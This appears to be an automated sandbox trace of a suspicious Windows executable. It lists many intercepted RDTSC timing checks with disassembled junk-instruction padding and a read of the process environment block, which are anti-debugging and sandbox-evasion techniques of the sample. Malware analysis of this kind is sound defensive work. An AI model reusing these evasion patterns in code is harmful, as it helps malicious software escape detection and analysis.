Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706B98 second address: 1706B9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706B9F second address: 1706BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706D15 second address: 1706D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706D20 second address: 1706D2A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB6E8B0C7E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706EB6 second address: 1706EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706EBB second address: 1706EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007FB6E8B0C7F5h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB6E8B0C7ECh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1707076 second address: 170707A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17077F2 second address: 170780E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB6E8B0C7F4h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170780E second address: 1707814 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1707F48 second address: 1707F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1707F4E second address: 1707F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1707F54 second address: 1707F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170DB8F second address: 170DB93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170DB93 second address: 170DB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170D704 second address: 170D708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170D708 second address: 170D70C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170D70C second address: 170D72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 js 00007FB6E8B0AED6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pop esi 0x00000013 jc 00007FB6E8B0AEEAh 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007FB6E8B0AED6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170D72F second address: 170D733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1710172 second address: 171018E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FB6E8B0AEDBh 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FB6E8B0AED6h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 171D6F7 second address: 171D6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 171D6FD second address: 171D70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB6E8B0AED6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 171D70A second address: 171D71F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 171D71F second address: 171D727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 171D727 second address: 171D73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0C7EDh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1720690 second address: 17206A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jnl 00007FB6E8B0AED6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 172022A second address: 1720269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FB6E8B0C7EBh 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB6E8B0C7F8h 0x00000015 jmp 00007FB6E8B0C7F1h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1720269 second address: 1720274 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1720274 second address: 172027A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 172027A second address: 1720280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1721FEE second address: 1721FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173282F second address: 1732837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1732837 second address: 173283B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17345D3 second address: 17345D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17345D9 second address: 17345E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173BBD3 second address: 173BBD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173BD41 second address: 173BD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173BED1 second address: 173BEEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE1h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173C049 second address: 173C04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173C04D second address: 173C064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB6E8B0AEDCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173C064 second address: 173C087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FB6E8B0C7E6h 0x0000000a jmp 00007FB6E8B0C7F9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173C1FC second address: 173C213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FB6E8B0AED6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007FB6E8B0AED6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173C213 second address: 173C223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173C223 second address: 173C23C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173C23C second address: 173C253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB6E8B0C7F1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173CF27 second address: 173CF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17400D6 second address: 17400DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17400DA second address: 17400E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17400E6 second address: 17400EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17400EC second address: 174011A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDBh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FB6E8B0AEF7h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB6E8B0AEE3h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 174011A second address: 174011E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173FDD8 second address: 173FDDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173FDDC second address: 173FDFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FB6E8B0C7F2h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17840A3 second address: 17840A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17840A7 second address: 17840AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1783F0B second address: 1783F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jno 00007FB6E8B0AED6h 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1783F1C second address: 1783F35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7EDh 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FB6E8B0C7E6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 177B582 second address: 177B588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 177B588 second address: 177B5A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007FB6E8B0C7E6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 177B5A3 second address: 177B5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 179186B second address: 1791871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1791871 second address: 1791875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1791875 second address: 179187B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 185FB71 second address: 185FB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007FB6E8B0AEDCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 185FB82 second address: 185FBCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FB6E8B0C7E6h 0x00000009 jmp 00007FB6E8B0C7F2h 0x0000000e jmp 00007FB6E8B0C7EDh 0x00000013 ja 00007FB6E8B0C7E6h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e js 00007FB6E8B0C7F4h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 jmp 00007FB6E8B0C7ECh 0x0000002b push edi 0x0000002c pushad 0x0000002d popad 0x0000002e pop edi 0x0000002f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 185FED1 second address: 185FEE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB6E8B0AEDFh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 185FEE8 second address: 185FF29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F9h 0x00000007 jmp 00007FB6E8B0C7F5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB6E8B0C7EAh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 185FF29 second address: 185FF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 186062E second address: 1860641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB6E8B0C7ECh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 186079C second address: 18607A6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB6E8B0AED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1864BDE second address: 1864BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1864BE5 second address: 1864BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1864C97 second address: 1864CA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FB6E8B0C7E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1864E46 second address: 1864E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB6E8B0AED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1864E50 second address: 1864E54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1864EF6 second address: 1864F29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB6E8B0AEE9h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 186519F second address: 18651A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 18651A3 second address: 18651A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1867DB5 second address: 1867DCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1867DCA second address: 1867DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB6E8B0AED6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1867DD5 second address: 1867DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0C7F3h 0x00000009 jno 00007FB6E8B0C7E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1869DC1 second address: 1869DED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDBh 0x00000007 pushad 0x00000008 jmp 00007FB6E8B0AEE0h 0x0000000d jng 00007FB6E8B0AED6h 0x00000013 jbe 00007FB6E8B0AED6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40059 second address: 6F40077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0C7F9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40077 second address: 6F400A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FB6E8B0AEDEh 0x00000016 add al, FFFFFFE8h 0x00000019 jmp 00007FB6E8B0AEDBh 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F400A5 second address: 6F400C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov edx, ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F400C5 second address: 6F400E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr fs:[00000030h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F400E2 second address: 6F400E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F400E6 second address: 6F400EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F400EC second address: 6F40143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 10C1h 0x00000007 mov esi, 401FF7FDh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f sub esp, 18h 0x00000012 pushad 0x00000013 movsx edx, cx 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 jmp 00007FB6E8B0C7ECh 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FB6E8B0C7F1h 0x00000025 xor al, 00000076h 0x00000028 jmp 00007FB6E8B0C7F1h 0x0000002d popfd 0x0000002e mov ch, 3Bh 0x00000030 popad 0x00000031 xchg eax, ebx 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 movsx ebx, ax 0x00000038 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40143 second address: 6F4016E instructions: 0x00000000 rdtsc 0x00000002 call 00007FB6E8B0AEE0h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB6E8B0AEDBh 0x0000000f popad 0x00000010 mov ebx, dword ptr [eax+10h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edi 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4016E second address: 6F40173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40173 second address: 6F40179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
